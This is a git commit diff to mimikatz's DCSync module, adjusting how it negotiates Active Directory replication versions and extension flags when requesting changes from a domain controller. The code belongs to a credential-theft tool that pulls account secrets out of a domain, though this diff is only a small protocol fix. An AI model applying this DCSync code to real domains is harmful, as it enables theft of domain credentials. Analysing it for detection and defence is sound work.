[remove] mimikatz lsadump::dcsync req v10 & rep v9

[future fix] mimikatz lsadump::dcsync pDrsExtensionsInt->dwExtCaps = MAXDWORD32
2025-03-02 08:40:22 +00:00 · 2016-06-06 01:51:30 +02:00 · 2016-06-06 01:51:30 +02:00 · ac09c27a40
commit ac09c27a40
parent 189203216f
3 changed files with 9 additions and 12 deletions
--- a/mimikatz/modules/kuhl_m_lsadump.c
+++ b/mimikatz/modules/kuhl_m_lsadump.c
@ -1758,7 +1758,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 							kprintf(L"[DC] ms-DS-ReplicationEpoch is: %u\n", DrsExtensionsInt.dwReplEpoch);
 						if(kull_m_rpc_drsr_getDCBind(&hBinding, &getChReq.V8.uuidDsaObjDest, &hDrs, &DrsExtensionsInt))
 						{
-							getChReq.V8.pNC = &dsName; // because union, V8 ~= V10, that's why :)
+							getChReq.V8.pNC = &dsName;
 							getChReq.V8.ulFlags = DRS_INIT_SYNC | DRS_WRIT_REP | DRS_NEVER_SYNCED | DRS_FULL_SYNC_NOW | DRS_SYNC_URGENT;
 							getChReq.V8.cMaxObjects = 1;
 							getChReq.V8.cMaxBytes = 0x00a00000; // 10M
@ -1766,10 +1766,10 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])

 							RpcTryExcept
 							{
-								drsStatus = IDL_DRSGetNCChanges(hDrs, (DrsExtensionsInt.dwFlagsExt & DRS_EXT_GETCHGREPLY_V9) ? 10 : 8, &getChReq, &dwOutVersion, &getChRep);
+								drsStatus = IDL_DRSGetNCChanges(hDrs, 8, &getChReq, &dwOutVersion, &getChRep);
 								if(drsStatus == 0)
 								{
-									if(((dwOutVersion == 6) || (dwOutVersion == 9)) && (getChRep.V6.cNumObjects == 1))// because union, V6 ~= V9, that's why :)
+									if((dwOutVersion == 6) && (getChRep.V6.cNumObjects == 1))
 									{
 										if(kull_m_rpc_drsr_ProcessGetNCChangesReply(getChRep.V6.pObjects))
 										{
--- a/modules/kull_m_rpc_drsr.c
+++ b/modules/kull_m_rpc_drsr.c
@ -183,10 +183,8 @@ BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObject
 							pDrsExtensionsInt->dwReplEpoch = pDrsExtensionsOutput->dwReplEpoch;
 							if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, ConfigObjGUID) - sizeof(DWORD))
 							{
-								pDrsExtensionsInt->dwFlagsExt = pDrsExtensionsOutput->dwFlagsExt & DRS_EXT_RECYCLE_BIN;
-								if(pDrsExtensionsOutput->dwFlagsExt & DRS_EXT_UNK_NEEDED_2016_TP5) // don't ask me why
-									pDrsExtensionsInt->dwFlagsExt |= DRS_EXT_UNK_NEEDED_2016_TP5 | DRS_EXT_GETCHGREPLY_V9;
-								pDrsExtensionsInt->dwExtCaps = pDrsExtensionsInt->dwFlagsExt;
+								pDrsExtensionsInt->dwExtCaps = MAXDWORD32;
+								//pDrsExtensionsInt->dwFlagsExt = pDrsExtensionsOutput->dwFlagsExt & (DRS_EXT_RECYCLE_BIN | DRS_EXT_PAM);
 								if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwExtCaps) - sizeof(DWORD))
 									pDrsExtensionsInt->ConfigObjGUID = pDrsExtensionsOutput->ConfigObjGUID;
 							}
@ -420,7 +418,6 @@ void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_G
 		switch(dwOutVersion)
 		{
 		case 6:
-		case 9: // yeah, I know, it's bad, but you know... '''UNION'''
 			if(reply->V6.pNC)
 				MIDL_user_free(reply->V6.pNC);
 			if(reply->V6.pUpToDateVecSrc)
@ -473,9 +470,9 @@ void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_G
 		case 1:
 		case 2:
 		case 7:
-		//case 9:
-		//	PRINT_ERROR(L"TODO (maybe?)\n");
-		//	break;
+		case 9:
+			PRINT_ERROR(L"TODO (maybe?)\n");
+			break;
 		default:
 			PRINT_ERROR(L"dwOutVersion not valid (0x%08x - %u)\n", dwOutVersion, dwOutVersion);
 			break;
--- a/modules/kull_m_rpc_drsr.h
+++ b/modules/kull_m_rpc_drsr.h
@ -66,7 +66,7 @@ void __RPC_USER midl_user_free(void __RPC_FAR * p);
 #define	DRS_EXT_LH_BETA2							0x00000002
 #define	DRS_EXT_RECYCLE_BIN							0x00000004
 #define DRS_EXT_GETCHGREPLY_V9						0x00000100
-#define DRS_EXT_UNK_NEEDED_2016_TP5					0x00000200	// TO RENAME
+#define DRS_EXT_PAM									0x00000200

 #define DRS_ASYNC_OP								0x00000001
 #define DRS_GETCHG_CHECK							0x00000002